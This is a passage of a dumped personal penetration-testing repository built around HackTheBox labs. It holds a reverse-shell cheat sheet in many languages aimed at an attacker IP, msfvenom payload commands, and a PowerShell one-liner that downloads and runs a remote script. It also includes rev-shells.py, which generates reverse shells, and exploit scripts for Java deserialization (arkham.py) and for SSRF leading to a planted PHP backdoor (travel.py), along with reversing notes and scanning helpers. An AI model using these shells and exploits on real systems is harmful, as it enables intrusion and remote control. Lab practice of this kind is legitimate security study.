-quiet -connect {attacker IP}:{port} > /tmp/s; rm /tmp/s\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.14.32:1337 > /tmp/s; rm /tmp/s\n\n# on the attacker machine\n# Generating ssl cert and key\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n# configuring on the specified port and listenting\n# syntax: openssl s_server -quiet -key key.pem -cert cert.pem -port {port}\nopenssl s_server -quiet -key key.pem -cert cert.pem -port 1337\n# or ncat instance \n# syntax: ncat --ssl -vv -l -p {port}\nncat --ssl -vv -l -p 1337\n```\n\n#### Powershell \n```bash\n# on the victim machine\n# 1.syntax: powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{attacker IP}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.14.32\",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# 2.Syntax: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker IP}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.32',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# 3. Modify the IP in this file and replace share it to the victim\npowershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### AWK \n```bash\n# on the victim machine\n# syntax: awk 'BEGIN {s = \"/inet/tcp/0/{attacker IP}/{port}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\nawk 'BEGIN {s = \"/inet/tcp/0/10.10.14.32/1337\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### TCLsh \n```bash\n# on the victim machine\n# syntax: echo 'set s [socket {attacker IP} {port}];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\necho 'set s [socket 10.10.14.32 1337];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Java \n```bash\n# on the victim machine\n# syntax: r = Runtime.getRuntime()\n# p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{attacker IP}/{port};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\n# p.waitFor()\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.10.14.32/1337;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Lua \n```bash\n# on the victim machine\n# 1.Only On Linux syntax: lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{attacker IP}','{port}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('10.10.14.32','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');\"\n\n# 2.On Both linux and windows:lua5.1 -e 'local host, port = \"{attacker IP}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()' \nlua5.1 -e 'local host, port = \"10.10.14.32\", 1337 local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### MSF Reverse Shell\n```bash\n# on the attacker machine to generate files which will yield shell rather than msf session\n# transfer the generated file to the victim machine in order to obtain the shell, change the IP and Port \n\n# war file\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f war > reverse.war\n\n# exe file\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f exe > reverse.exe\n\n# elf file\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f elf >reverse.elf\n\n# macho file\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f elf >reverse.elf\n\n# aspx file\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f aspx > exploit.aspx\n\n# jsp file\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.jsp\n\n# python file\nmsfvenom -p cmd/unix/reverse_python LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.py\n\n# sh file\nmsfvenom -p cmd/unix/reverse_bash LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.sh\n\n# perl file\nmsfvenom -p cmd/unix/reverse_perl LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.pl\n\n# after transferring\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### XTerm \n```bash\n# on the victim machine\nxterm -display 10.10.14.32:1\nXnest :1\nxhost +targetip\n\n# on the attacker machine \nnc -lvnp 6001\n```\n\n#### Magic Bytes reverse shell \n```bash\n# Using magic bytes\necho 'FFD8FFDB' | xxd -r -p > webshell.php.jpg\necho '' >> webshell.php.jpg\n\n# Using exiftool\nexiftool -comment='' \\.\\\n\n# normal php executables\n\n\n\n\n```\n\n##### References:\n- The reverse shells are composed in a place taken from [here](https://krober.biz/misc/reverse_shell)\n- Some points are reffered form [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)\n- Php reverse shell bt [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell)\n"
},
{
"path": "notes/Reversing.md",
"content": "# Reversing\n\n## Debuggers\n- [IDA Hex Rays](https://www.hex-rays.com/products/ida/support/download_freeware/)\n- [Ghidra](https://ghidra-sre.org/)\n- [Radare2](https://rada.re/n/radare2.html)\n- [Cutter](https://cutter.re/)\n- [GDB](https://www.gnu.org/software/gdb/)\n- [pwntools](https://github.com/Gallopsled/pwntools)\n\n## Commands\n\n- [GDB](#gdb)\n- [Radare2](#r2)\n- [Misc](#misc)\n\n### gdb \n```bash\n# gdb\n# load the binary\ngdb ./binary\n\n# gather information about the available functions in the binary\ninfo functions\n\n# disassemble a function\ndisassemble {function-name} # disassemble main\n\n# change disassemble method from AT&T format to INTEL format\nset disassembly-flavor intel # views instructions in intel format\nset disassembly-flavor att # views instructions in AT&T format\n\n# set a breakpoint at a specific address\nbreak *{memory-adddress} # break *0x000011c6\n\n# run the progam until it reaches the breakpoint\nr\n\n# move to next instruction\nn\n\n# step to next instruction\ns\n\n# gather information about the contents of the registers\ninfo registers\n\n# gather information on flags\np $eflags\n\n# view the contents of the stack\n# prints 20 bytes of hexdata from the memory address held by esp\nx/20x $esp # esp is referenced since it changes value on pushing and popping things in/out of the stack\n```\n\n### radare2 / r2 \n```bash\n# r2\n# open the files in disassemble mode\nr2 -d ./binary\n\n# analyze all the available symbols, datas etc..,\naaa\n\n# list the available functions in the binary\nafl\n\n# move to a function\ns {function-name} # s main\n\n# print the disassmbled function\npdf\n\n# disassemble a function with function name\npdf @{function-name} # pdf @sym.vuln\n\n# create a breakpoint ------------\ndb {memory-address} # db 0x5662a1ef |\n |\n# run until breakpoint is reached |\ndc |\n |\n# run until a call instruction is reached |===============> debugger Commands \ndcc |\n |\n# run until a ret instruction is reached |\ndcr |\n |\n# move to next instruction ------------\nds\n\n\n# switch to visual mode\n## Visual mode commands are specified with ## prefix\nV # gives stack view of the program\n\n## switch to interactive mode where stack, registers, disassembly are shown\n!\n\n## split the panes\n| # vertical split\n- # horizontal split\n\n## add new section\n# wide options will be shown like breakpoints, hexdumps, functions etc..,\n + \" \n\n## execute commands in visual mode\n: {debugger-command} # :dcc\n\n## restart the execution with same breakpoints\n: ood\n\n## Quit the visual mode\nq\n\n# quit r2 without confirmation\nQ\n```\n\n### Misc \n```bash\n# know the security implementaions on the binary\nchecksec --file ./binary\n\n# know the functions in the binary\nreadelf --syms ./binary\n\n# obtain spectif section's data\nreadelf -sj {section-name} ./binary # readelf -sj .rodata ./binary\n\n# otain the crash message\ndmesg\n```"
},
{
"path": "notes/linux-cli-productivity.md",
"content": "# Linux Productivity \n---\n\nTools to perform actions in the terminal\n\n## Table Of Contents\n\n- [Package Location](#pl)\n---\n\n### Package Location \n\n- Obtain the location of the software that will be installed without installing the software\n- The output will be the location of the files that will be installed, with their path\n- All the files location will be installed thus the home direcotry can be obtained\n\n```bash\nsudo apt-get install apt-file\napt-file serach \n```\n"
},
{
"path": "scripts/README.md",
"content": "# Scripts\n\n- Some of the dump scripts created while playing !\n- Nvm if it isnt attaractive !!\n\n### hackthebox\n- arkham.py --> Have the ysoserial in the current directory and pass the arguments, `url`, `command`, `secretkey`\n- htb-machines.py --> Prints the htb machines from its api\n- name_grab.py --> Grabs the file names in the git repo, created for traceback machine.\n- nc-portscan.sh --> Port scanner using nc\n- rev-shells.py --> Generates reverseshell based on the provided switch `bash, nc, python, perl, ruby, php, socat`\n- snapwr3nch.py --> prints the htb machine pwned achievement to a image file\n- travel.py --> Automated SSRF with gopher scheme and obtains shell as `www-data`\n- wr3nch.py --> first ever created automation script for htb */not so good/, dont want to make changes since its the starting step* \n- xpath-inj.py --> XPath Injection on login with usernamed loaded to the script\n\n### installation\n#### Docker installation scripts\n- docker-linux.sh\n- docker-parrot.sh\n- docker-standard.sh\n\n- fping-install.sh --> fping is used to perform network sweep and obtain available users information\n- pwntools-python3.sh --> installs pwntools\n- ptyhon[2|3]-pip.sh --> installs pip2.* and pip3.*\n\n\n### misc\n- adapter.sh --> When used with [.p10k.zsh](https://github.com/romkatv/powerlevel10k) example function , if the vpn is available, it will show in the right side\n- bashrc_custom --> Copy the files content and into `~/.bashrc` file and source it. Enjoy π. Best with tmux ! \n- fix-bg-noise-obs.sh --> fixes the background static noise in linux when recorded using obs studio\n- pdf-protect.sh --> script I use to protect writeup pdf's with password\n- report-gen.md --> model md file to genereate pdfs with latex\n- report.sh --> generates pdf from markdown using latex"
},
{
"path": "scripts/hackthebox/arkham.py",
"content": "#!/usr/bin/python\n\nfrom base64 import b64encode,b64decode\nfrom hashlib import sha1\nfrom pwn import *\nfrom requests import post, get\n\nimport hmac\nimport os\nimport pyDes\nimport sys\n\ndef main():\n if len(sys.argv) < 4:\n print(\"Java JSF exploit\")\n # secret: SnNGOTg3Ni0=\n print(\"Usage: {} \\n\".format(sys.argv[0]))\n sys.exit()\n\n url = sys.argv[1]\n cmd = sys.argv[2]\n secret = sys.argv[3]\n\n log.info(\"Payload provided: {}\".format(cmd))\n cmd = \"java -jar ./ysoserial.jar CommonsCollections6 \\\"{}\\\" > payload.bin\".format(cmd)\n log.info(\"Generating the payload with: {}\".format(cmd))\n os.system(cmd)\n\n log.info(\"Payload was written to payload.bin, reading it into variable...\")\n with open(\"payload.bin\", \"rb\") as f:\n payload = f.read()\n\n log.info(\"Length of payload: {} bytes\".format(len(payload)))\n\n key = b64decode(secret)\n des = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)\n enc = des.encrypt(payload)\n b = hmac.new(key, bytes(enc), sha1).digest()\n payload = enc + b\n\n log.info(\"Sending encoded payload: {}\".format(b64encode(payload)))\n data = {\"javax.faces.ViewState\": b64encode(payload)}\n r = post(url, data=data)\n log.success(\"Done!\")\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"path": "scripts/hackthebox/htb-machines.py",
"content": "import requests\nimport json\nimport sys\nfrom pwn import *\n\nif len(sys.argv[1:]) != 1:\n\tprint(\"Usage: {} \".format(sys.argv[0]))\n\tsys.exit()\n\nurl = \"https://www.hackthebox.eu/api/machines/get/all?api_token=\"\napi_key = sys.argv[1]\nurl += api_key\nprint(url)\nheaders = {\"User-agent\": \"Mozilla 5.0\"}\n\nre = requests.get(url=url, headers=headers)\nif re.status_code == 200:\n\tmachines = re.json()\n\tlog.info(\"Total of {} Machines\".format(len(machines)))\n\n\ttry:\n\t\tfor i in range(0, len(machines)+1):\n\t\t\tfile_ = open(\"machines.txt\", 'a')\n\t\t\t#print(\"- [ ] {} - {} - {} - {} : {}
\\n\\nTechniques<\\summary>\\n - Yet to be completed \\n<\\details>\".format(machines[i]['id'], machines[i]['name'], machines[i]['os'], machines[i]['ip'], machines[i]['rating']))\n\t\t\tlines = \"- [ ] {} - {} - {} - {} : {}
\\n\\n\\t Summary of the box
\\n - Yet to be completed \\n \\n\\n\".format(machines[i]['id'], machines[i]['name'], machines[i]['os'], machines[i]['ip'], machines[i]['rating'])\n\t\t\tfile_.write(lines)\n\t\t\tfile_.close()\n\n\texcept IndexError:\n\t\tprint(\"All Machines Logged\")\n\t\tsys.exit()\n\texcept KeyboardInterrupt:\n\t\tlog.warning(\"Operation Ended by user\")\n\t\tsys.exit()\n\n\n"
},
{
"path": "scripts/hackthebox/name_grab.py",
"content": "import requests\nfrom bs4 import BeautifulSoup\nfrom optparse import OptionParser as op\nimport sys\n\nURL = str(input(\"Enter the github URL: \"))\n\nprint(\"Scraping for file names in: {}\".format(URL))\n\nr = requests.get(URL)\nsoup = BeautifulSoup(r.text, 'html.parser')\ncontainer_ = soup.find('div',{'class':\"js-details-container Details\"})\nname_ = container_.find_all('a',{'class':'js-navigation-open link-gray-dark'})\nfor i in name_:\n print(i.get('title'))\n"
},
{
"path": "scripts/hackthebox/nc-portscan.sh",
"content": "#!/bin/bash\n\nif [ $# -eq 0 ]; then\n echo \"Pass the ip to scan for scan\";\n echo \"usage: nc-portscan \";\n exit 1\nfi\n\necho \"looking for open ports in $1\"\nfor i in $(seq 1 65535); do echo \"Port: $i\"; nc -zv $1 $i 2>&1 | grep open; do\n"
},
{
"path": "scripts/hackthebox/rev-shells.py",
"content": "#!/usr/bin/env python3\n\nfrom pwn import *\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Quick Reverse shell provider\")\nparser.add_argument('-b', '--bash',metavar=('ip', 'port'), help=\"bash reverse shell\", nargs=2)\nparser.add_argument('-n', '--nc',metavar=('ip', 'port'), help=\"netcat reverse shell\", nargs=2)\nparser.add_argument('-py', '--python',metavar=('ip', 'port'), help=\"python reverse shell\", nargs=2)\nparser.add_argument('-p', '--perl',metavar=('ip', 'port'), help=\"perl reverse shell\", nargs=2)\nparser.add_argument('-r', '--ruby',metavar=('ip', 'port'), help=\"ruby reverse shell\", nargs=2)\nparser.add_argument('-php', '--php',metavar=('ip', 'port'), help=\"php reverse shell\", nargs=2)\nparser.add_argument('-s', '--socat',metavar=('ip', 'port'), help=\"socat reverse shell\", nargs=2)\nargparse = parser.parse_args()\n\ndef logo():\n\tprint(\"\"\"\n## ## ######## ####### ## ## ###### ## ## ######## ###### ## ## ####### ## ## \n## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## \n## ## ## ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## ## \n## ## ## ######## ####### ## ## ## ## ######### ######## ###### ######### ####### ## ## \n## ## ## ## ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## \n## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## \n ### ### ## ## ####### ## ## ###### ## ## ## ## ###### ## ## ####### ######## ######## \n\n \"\"\")\n\nif argparse.bash:\n\tlog.info(f'bash -i >& /dev/tcp/{argparse.bash[0]}/{argparse.bash[1]} 0>&1')\nelif argparse.nc:\n\tlog.info(f\"nc -e /bin/sh {argparse.nc[0]} {argparse.nc[1]}\")\n\tlog.info(f\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {argparse.nc[0]} {argparse.nc[1]} >/tmp/f\")\nelif argparse.python:\n\tlog.info(f\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{argparse.python[0]}',{argparse.python[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'\")\nelif argparse.perl:\n\tlog.info(f\"perl -e 'use Socket;$i='{argparse.perl[0]}';$p={argparse.perl[1]};socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};'\\n\")\nelif argparse.php:\n\tlog.info(f\"php -r '$sock=fsockopen('{argparse.php[0]}',{argparse.php[1]});exec('/bin/sh -i <&3 >&3 2>&3');'\")\n\tlog.info(\"\")\n\tlog.info(f\"& /dev/tcp/{argparse.php[0]}/{argparse.php[1]} 0>&1\\\"');\")\nelif argparse.ruby:\n\tlog.info(f\"ruby -rsocket -e'f=TCPSocket.open('{argparse.ruby[0]}',{argparse.ruby[1]}).to_i;exec sprintf('/bin/sh -i <&%d >&%d 2>&%d',f,f,f)'\")\nelif argparse.socat:\n\tlog.info(\"On the Attacker Machine: \\n\")\n\tlog.success(f\"socat file:`tty`,raw,echo=0 tcp-listen:{argparse.socat[1]}\")\n\tlog.info(\"On the Client Machine: \\n\")\n\tlog.success(f\"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{argparse.socat[0]}:{argparse.socat[1]}\")\nelse:\n\tlogo()\n\tparser.print_help()\n\t\n\n\n"
},
{
"path": "scripts/hackthebox/snapwr3nch.py",
"content": "'''\n##############################################################################################\n provide your htb user id, machine Id and machine name\n user id : https://www.hackthebox.eu/home/users/profile/220867, 220867 9s the profile id\n api key can be found in `hackthebox.eu/home/settings`\n enter the machine name and get snapped =)\n\nrequired modules\n1. requests - pip3 install requests\n2. imgkit - pip3 install imgkit\nwkhtmltopdf to be used by imgkit - sudo apt-get install wkhtmltopdf\n3. coloroma - pip install colorama\n\nISSUE:\nIf you face error like: `requests.exceptions.SSLError: HTTPSConnectionPool`\nplease add `,verify= False)` in line 44\n\n###############################################################################################\n'''\n\nimport requests\nimport sys\nfrom colorama import Fore, Back, Style\nimport json\nimport imgkit\n\nBOLD = '\\033[1m'\nUNBOLD = \"\\033[0;0m\"\n\n\ndef gen():\n\t#variables\n\tURL = 'https://www.hackthebox.eu/api/machines/get/all?api_token='\n\tapi_ = input(\"Enter your API Key: \")\n\tURL += api_\n\n\n\tach_ = 'https://www.hackthebox.eu/achievement/machine/'\n\tuserId = input(\"Enter your htb id: \")\n\tmacNam = ''\n\n\tHEADERS = { 'User-agent': 'Mozilla 5.0'}\n\tmacId = ''\n# process\n\tr = requests.get(url = URL, headers = HEADERS)\n\tif r.status_code == 200:\n\t\tmachines = r.json()\n\n\t\tname = input(\"Machine name: \")\n\t\tmacNam = name\n\t\tfor machine in machines:\n\t\t\tif machine['name'].lower() == name.lower():\n\t\t\t\tmacId = str(machine['id'])\n\n\n\tprint(\"==================================================================\")\n\tprint(\"Capturing the \" + macNam + \" machine\")\n\tprint(\"==================================================================\")\n\n\n\tdn = ach_ + userId + '/' + macId\n\tred = requests.get(url = dn, headers = HEADERS)\n\t#print(dn)\n\n\tif \"Invalid\" in red.text:\n\t\tprint(\"Looks like, you Haven't completed the \"+ macNam + \"machine yet (>_<)\")\n\telse:\n\t\tprint(\"Congratulations on completing the box =D\")\n\t\tprint('Processing the snapshot...')\n\t\timgkit.from_url( dn , macNam +'.jpg')\n\n\n\ndef logo():\n print(Fore.LIGHTGREEN_EX + \"\"\" \n\n \t .oooo. oooo \n .dP\"\"Y88b `888 \n .oooo.o ooo. .oo. .oooo. oo.ooooo. oooo oooo ooo oooo d8b ]8P' ooo. .oo. .ooooo. 888 .oo. \nd88( \"8 `888P\"Y88b `P )88b 888' `88b `88. `88. .8' `888\"\"8P <88b. `888P\"Y88b d88' `\"Y8 888P\"Y88b \n`\"Y88b. 888 888 .oP\"888 888 888 `88..]88..8' 888 `88b. 888 888 888 888 888 \no. )88b 888 888 d8( 888 888 888 `888'`888' 888 o. .88P 888 888 888 .o8 888 888 \n8\"\"888P' o888o o888o `Y888\"\"8o 888bod8P' `8' `8' d888b `8bd88P' o888o o888o `Y8bod8P' o888o o888o \n 888 \n o888o \n\n \"\"\" + Fore.RESET)\n\n\nif __name__ == \"__main__\":\n logo()\n print(\"Simple SnapShot tool by wr3nch\")\n print(BOLD + 'Coded by a n00b: '+ Fore.BLUE + 'cyberwr3ch' + Fore.LIGHTBLACK_EX + '\\nMember of TCSC' + Fore.RESET)\n print('With the help of my bros, AdithyanAK and Gokul' + UNBOLD)\n gen()\n print(\"\\n Happy Hacking\")\n"
},
{
"path": "scripts/hackthebox/travel.py",
"content": "#!/usr/bin/env python3\nfrom urllib import parse\nfrom pwn import *\nfrom requests import *\n\n# variables\nfileN = input(str(\"Enter the backdoor name .php > \"))\ncommandN = input(str(\"Enter the php command >\"))\nkey = \"xct_4e5612ba079c530a6b1f148c0b352241\"\n\n# object creation\nobj ='O:14:\"TemplateHelper\":2:{s:4:\"file\";s:'+str(len(fileN))+':\"'+fileN+'\";s:4:\"data\";s:'+str(len(commandN))+':\"'+commandN+'\";}'\nlength = len(obj)\nlog.warning(\"PHP Object Created with length {}\".format(length))\n\n# gopher url\nlog.info(\"gopher url generated\")\ngopherurl = \"%0d%0aset {} 4 0 {}%0d%0a{}%0d%0a\".format(key,length,obj)\nlog.info (\"attempting SSRF\")\n\n# replacing url characters cause might result in double url encoding which causes to fail the exploit\n# ssrf_url = \"gopher://127.00.0.1:11211/_\"+parse.quote(gopherurl)\nssrf_url = \"gopher://127.00.0.1:11211/_\"+parse.quote(gopherurl).replace(\"+\",\"%20\").replace(\"%2F\",\"/\").replace(\"%25\",\"%\").replace(\"%3A\",\":\")\n\n\n# making request to the awesome-rss with customurl set\n#make = \"http://blog.travel.htb/awesome-rss/?debug=yes&custom_feed_url=\"+ssrf_url\n\nmake = \"http://blog.travel.htb/awesome-rss/?custom_feed_url=\"+ssrf_url\nlog.info(\"performing request on {}\".format(make))\nr = get(make)\nif r.status_code == 200:\n log.info(\"Successfully made the request\")\n log.info(\"Reloading contents\")\n req = get(\"http://blog.travel.htb/awesome-rss/\")\n if req.status_code == 200:\n log.warning(\"looking for backdoor\")\n door = \"http://blog.travel.htb/wp-content/themes/twentytwenty/logs/\"+fileN\n back = get(door)\n if back.status_code == 200:\n log.success(\"{} found\".format(fileN))\n log.success(\"Backdoor location: {} \\n\".format(door))\n else:\n log.failure(\"backdoor not found, server with the status code '{}'\".format(back.status_code))\n else:\n log.failure(\"Connection to refresh failed: {}\".format(req.status_code))\n\n\n###\n# Logs\n# - Observed changes when using rawurlencode(), changes occured \".Template.file & .Template.data\" - [x]\n# - Changed the change and looked no good result - [x]\n# - Add feed url and change the xct_ cache according to that - [ongoing]\n###\n"
},
{
"path": "scripts/hackthebox/wr3nch.py",
"content": "#!/bin/python3\r\n\r\nimport os\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Back, Style\r\n\r\nBOLD = '\\033[1m'\r\n\r\nmachine_ = input(str(\"Enter machine name: \"))\r\nip_ = input(str(\"Enter machine IP: \"))\r\nhttp_ = \"\"\r\nhttps_ = \"\"\r\nhport_ = int(80)\r\nhsport_ = \"443\"\r\n\r\n\r\ndef nmap():\r\n print(BOLD + Fore.BLUE + \" \\n \\n[+]NMAP Enumeration Started \\n\" + Fore.WHITE)\r\n nmap_ = 'sudo nmap -Pn -vv -sC -sV -oN {}.nmap {}'.format(machine_, ip_)\r\n os.system(nmap_)\r\n print(BOLD + Fore.RED + \"[+] NMAP Enumeration Ended \\n\" + Fore.WHITE)\r\n print(BOLD + Fore.CYAN + \"[+] LOOKING FOR PORTS [+]\" + Fore.WHITE)\r\n ports(\"{}.nmap\".format(machine_))\r\n\r\n\r\ndef ports(scanOutput):\r\n with open(scanOutput) as outPut:\r\n if \"http\" in outPut.read():\r\n por_ = \"grep -w 'http' %s.nmap | cut -d '/' -f 1 | awk 'NR==1{print $1}' | cut -c1-5\" % machine_\r\n print(Fore.LIGHTBLUE_EX + \"HTTP Port found in: \")\r\n global hport_\r\n hports_ = os.popen(por_).read()\r\n hport_ = int(hports_)\r\n print(hport_)\r\n global http_\r\n http_ = 1\r\n direnumeration()\r\n\r\n elif 'https' in outPut.read():\r\n por_ = \"grep -w 'http' %s.nmap | cut -d '/' -f 1 | awk 'NR==1{print $1}' | cut -c1-5\" % machine_\r\n print(Fore.LIGHTBLUE_EX + \"HTTP Port found in: \")\r\n global hsport_\r\n hports_ = os.popen(por_).read()\r\n hsport_ = int(hports_)\r\n print(hsport_)\r\n global https_\r\n https_ = 1\r\n direnumeration()\r\n \r\n else:\r\n print(BOLD + Fore.RED + \"HTTP / HTTPS ports are not found\")\r\n print(BOLD + Fore.YELLOW + \"Enumerating UDP ports\")\r\n nmapUDP = 'sudo nmap -sU {}'.format(ip_)\r\n os.system(nmapUDP)\r\n\r\n\r\n\r\ndef direnumeration():\r\n print(BOLD + Fore.MAGENTA + \"[+] Directory Enumeration\" + Fore.WHITE)\r\n while http_ :\r\n gobuster_ =\"gobuster dir -u http://{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,402,403,404,502 -x php,html,json,text -t 5 -o go-http.txt\".format(ip_, hport_)\r\n os.system(gobuster_)\r\n print(BOLD + Fore.RED + '[+] Root Directory Enumerated')\r\n print(BOLD + Fore.GREEN + \"[+]VHost LookUp[+]\" + Fore.WHITE)\r\n vhost()\r\n \r\n while https_:\r\n gobuster_ =\"gobuster dir -u http://{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,402,403,404,502 -x php,html,json,text -t 5 -o go-http.txt\".format(ip_, hport_)\r\n os.system(gobuster_)\r\n print('[+] Root Directory Enumerated')\r\n print(Fore.BLUE + \"[+] Directory enumerated\")\r\n\r\n\r\n\r\ndef vhost():\r\n print(BOLD + Fore.YELLOW + \"[+] VHOST Checking\" + Fore.WHITE)\r\n vhst = \"ffuf -u http://FUZZ/{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -sf -fc 401,402,403,404 -of vhost-ffuf.json\".format(ip_,hport_)\r\n os.system(vhst)\r\n user_ = 'whoami'\r\n print(BOLD + Fore.RED + \"[+] VHOST Enumeration Completed\")\r\n print(BOLD + Fore.LIGHTCYAN_EX + \"Every Process is done\" + Fore.RESET)\r\n print(BOLD + Fore.GREEN + \"{+} Everthing is done, Meet you soon :\")\r\n os.system(user_)\r\n sys.exit()\r\n\r\n\r\n\r\ndef logo():\r\n print(Fore.LIGHTGREEN_EX + \"\"\" \r\n ____ _ \r\n __ __ ___ |__ /_ _ __| |_ _ __ _ _ \r\n \\ V V / '_|_ \\ ' \\/ _| ' \\ _| '_ \\ || |\r\n \\_/\\_/|_||___/_||_\\__|_||_(_) .__/\\_, |\r\n |_| |__/ \r\n \"\"\" + Fore.RESET)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n logo()\r\n print(\"Test Version 2.0\")\r\n print(BOLD + 'Coded by a n00b: '+ Fore.BLUE + 